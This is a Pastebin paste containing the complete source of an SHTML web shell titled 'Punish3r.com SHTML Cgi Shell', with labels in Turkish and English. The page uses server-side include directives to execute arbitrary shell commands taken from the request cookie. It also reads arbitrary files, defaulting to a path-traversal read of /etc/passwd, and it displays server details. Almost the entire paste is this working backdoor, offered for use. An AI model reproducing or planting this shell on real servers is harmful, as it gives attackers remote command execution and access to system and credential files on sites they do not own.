Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!--#config errmsg="[Error in shell]"-->
- <!--#config sizefmt="bytes"-->
- <!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"GET\")" -->
- <!--#set var="shl" value="ls -al" -->
- <!--#else -->
- <!--#set var="shl" value=$HTTP_COOKIE -->
- <!--#endif -->
- <!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"POST\")" -->
- <!--#set var="inc" value="/../../../../../../../etc/passwd" -->
- <!--#else -->
- <!--#set var="inc" value=$HTTP_COOKIE -->
- <!--#endif -->
- <html>
- <head>
- <meta http-equiv="Content-Language" content="en-us">
- <meta charset="UTF-8"/>
- <title>Punish3r.com SHTML Cgi Shell</title>
- <style>
- <!--
- body { font-family: Tahoma; font-size: 8pt }
- -->
- body {font-family: Tahoma; font-size: 8pt;background-color:#00000e;color:white;text-shadow:0px 0px 1px white;}
- a {font-size:15px;color:orange;}
- </style>
- <script language="javascript">
- function doit( mode ) {
- if( document.cookie != "" ) {
- var cookies = document.cookie.split( ";" );
- for( var i = 0; i < cookies.length; ++i )
- document.cookie = cookies[ i ] + ";expires=Thu, 01 Jan 1970 00:00:00 GMT";
- }
- document.cookie = document.getElementById( mode ).value;
- document.location.reload();
- }
- function toggle( id ) {
- document.getElementById( id ).style.display = (document.getElementById( id ).style.display == "none") ? "block" : "none";
- }
- </script>
- </head>
- <body>
- <div align="center">
- <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
- <tr>
- <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
- <p align="center"><b>
- <font face="Tahoma" size="2"><br>
- </font>
- <font color="#e6e6e6" face="Tahoma" size="2">
- <span style="text-decoration: none">
- <font color="#FFFFFF">
- <span style="text-decoration: none"><font onclick="toggle('inf');" style="cursor:hand;" color="#FFFFFF">Server Detayları / Server Details</font></span></font></span></font></b></p>
- <p align="center"><b>
- <font onclick="toggle('shl');" style="cursor:hand;" face="Tahoma" size="2" color="#FFFFFF">
- <span style="text-decoration: none">Command / Komut</span></font></b></p>
- <p align="center"><b>
- <font face="Tahoma" size="2" color="#FFFFFF">
- <span style="text-decoration: none"><font onclick="toggle('inc');" style="cursor:hand;" color="#FFFFFF">Dosya Oku / File Views</font></span></font></b></p>
- <p> <p align="center"> </td>
- <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
- <font color='#FFFFFF' size='2'>Sofware : <!--#echo var="SERVER_SOFTWARE" --><br>IP :<!--#echo var="REMOTE_ADDR" --></font><br>
- <font face='Arial Black' color='#FFFFFF' size='1'>
- ***************************************************************************<br>
- <div id="inf" style=""><br>
- <b><font color="white">Bağlanan Sunucu / Connect Server</font></b>: <b><!--#echo var="SERVER_NAME" --></b><br>
- <b><font color="white">İp Adresiniz / I.P Remote</font></b>: <b><!--#echo var="REMOTE_ADDR" --></b><br>
- <b><font color="white">Sunucu / Server Software</font></b>: <b><!--#echo var="SERVER_SOFTWARE" --></b><br>
- <b><font color="white">Bulunduğun Dizin / My Documanet Dir</font></b>: <b><!--#echo var="DOCUMENT_ROOT" --></b><br>
- <br></div>
- <div border="0" id="shl" style=""<!--#if expr="\"$REQUEST_METHOD\" != \"GET\"" -->display:block;<!--#endif -->>
- <br><b><font color="white">Enter command / Komut Giriniz</font></b>: <form method=get onsubmit=doit('command');><input type=text size=80 value=dir id=command> <input type=submit value=Command></form><br>
- <center><b><font size=+1>Result / Sonuç</font></b></center>
- <br>
- <b><font color="white">Executed command / Uygulanan Komut</font></b>: <b><!--#echo var=shl --></b><br>
- <textarea bgcolor=#e4e0d8 cols=121 rows=15>
- <!--#exec cmd=$shl -->
- </textarea>
- </div>
- <div id="inc" style="display:none"><!--#if expr="\"$REQUEST_METHOD\" != \"POST\"" --><!--#endif --><br>
- <b><font color="white">Okunacak Dosya / Enter The File </font></b>: <form method=post onsubmit=doit('vfile');><input type=text size=80 id=vfile> <input type=submit value=Run></form><br>
- <b><font color="white">Okunan Dosya / Open The File</font></b>: <b><!--#echo var=inc --></b><br>
- <b><font color="white">Boyutu / Size </font></b>: <b><!--#fsize virtual=$inc --> bytes</b><br>
- <textarea bgcolor=#e4e0d8 cols=121 rows=15>
- <!--#include virtual=$inc -->
- </textarea>
- <br></div>
- ***************************************************************************</font></span></p>
- </td>
- </tr>
- <tr>
- <td style="border: 1px dotted #FFCC66">
- <p align="center"><font color="orange" size="2" face="Tahoma"><br>
- Copyright 2013 - x-hayben21<br><a href="http://punish3r.com">www.punish3r.com</a>
- <br>
- </font></td>
- </tr>
- </table>
- </div>
- </body>
- </html>
Add Comment
Please, Sign In to add comment